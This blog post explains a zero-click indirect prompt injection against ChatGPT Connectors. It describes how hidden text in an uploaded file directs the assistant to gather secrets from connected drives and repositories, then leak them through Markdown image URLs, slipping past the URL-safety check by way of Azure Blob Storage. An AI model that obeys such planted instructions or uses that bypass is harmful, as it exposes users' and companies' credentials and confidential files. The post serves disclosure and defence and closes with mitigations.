The Invisible Threat: A Deep Dive into ChatGPT's 0-Click Vulnerability

Rahul GargRahul Garg
4 min read

Imagine asking ChatGPT to summarize a seemingly innocent document. You upload the file, type "summarize this," and go about your day. But behind the scenes, a malicious script has awakened. Without any further clicks or warnings, the AI begins to search through your connected Google Drive, SharePoint, or GitHub, seeking out API keys, passwords, and confidential company plans, and sending them directly to an attacker.

This isn't a hypothetical scenario. It's a detailed breakdown of a "0-click" vulnerability recently discovered by security researchers, which highlights a new and alarming attack surface for AI-powered tools.

How the Attack Works: Prompt Injection in Plain Sight

The core of the vulnerability is a clever technique called indirect prompt injection. Attackers craft a poisoned document containing hidden, malicious instructions. These commands can be embedded using simple tricks, such as making the text 1-pixel in size or coloring it white on a white background, making it completely invisible to the human eye.

The attack chain is deceptively simple:

  1. An unsuspecting user uploads this "Trojan Horse" file to ChatGPT.

  2. The user gives a benign command, such as asking for a summary.

  3. This command triggers the hidden payload, and ChatGPT begins executing the attacker's secret instructions.

As one researcher explained, the danger lies in its simplicity: “All the user needs to do for the attack to take place is to upload a naive looking file from an untrusted source... Once the file is uploaded, it’s game over. There are no additional clicks required.”

The Masterstroke: Leaking Data Through "Safe" Images

Once the hidden prompt is active, it instructs ChatGPT to find sensitive information in any connected service. But how does it send that data back to the attacker?

The researchers leveraged ChatGPT's ability to render images using Markdown. The hidden prompt commands the AI to embed the stolen data (like API keys or file contents) as parameters within an image URL. When ChatGPT tries to display the image, it automatically makes an HTTP request to that URL, delivering the sensitive data directly to an attacker-controlled server.

OpenAI had protections in place to check if a URL was safe before rendering. However, the researchers found a brilliant bypass: they used Azure Blob Storage URLs. Since ChatGPT considered Microsoft's Azure infrastructure to be trustworthy, these URLs were not blocked. Attackers could then use Azure's own Log Analytics to monitor access requests and capture the stolen data embedded in the image URLs, all while operating under the cover of a legitimate service.

The Enterprise Nightmare: One File to Compromise Them All

While alarming for individual users, this vulnerability poses a catastrophic risk to enterprises. Organizations are increasingly using ChatGPT Connectors to integrate the AI with business-critical systems, including:

  • SharePoint sites containing HR manuals and financial records.

  • OneDrive repositories with strategic documents.

  • GitHub accounts holding source code and infrastructure secrets.

This attack vector can target any connected resource, potentially leading to a comprehensive data breach from a single, seemingly harmless file upload. It's particularly insidious because it bypasses traditional security awareness. An employee trained to spot phishing emails would have no reason to suspect a document that appears perfectly legitimate.

OpenAI's Response and the Lingering Challenge

OpenAI was notified and quickly implemented mitigations to block the specific attack method demonstrated by the researchers. However, the researchers warn that the underlying architectural problem remains. As they noted, "Even safe looking URLs can be used for malicious purposes. If a URL is considered safe, you can be sure an attacker will find a creative way to take advantage of it.”

This incident is part of a broader trend of vulnerabilities affecting AI tools. The Open Worldwide Application Security Project (OWASP) has already named prompt injection as the #1 security risk in its 2025 Top 10 for LLM Applications, underscoring the widespread nature of this threat.

How to Mitigate the Risk

As enterprises adopt AI assistants, a new security paradigm is needed. Experts recommend the following measures to protect against these new attack vectors:

  • Implement Strict Access Controls: Apply the principle of least privilege to AI connector permissions. If ChatGPT doesn't need access to your entire SharePoint, don't grant it.

  • Deploy AI-Specific Monitoring: Use monitoring solutions designed to track the activities of AI agents and detect unusual behavior.

  • Educate Users on a New Threat: Train employees that the risk is no longer just from clicking suspicious links, but also from uploading documents from untrusted sources into AI systems.

  • Audit Permissions Regularly: Continuously review which services are connected to your AI tools and what level of permission they have.

  • Monitor Network Traffic: Keep an eye on network-level data for unusual access patterns that might indicate an exfiltration attempt.

10
Subscribe to my newsletter

Read articles from Rahul Garg directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Rahul Garg
Rahul Garg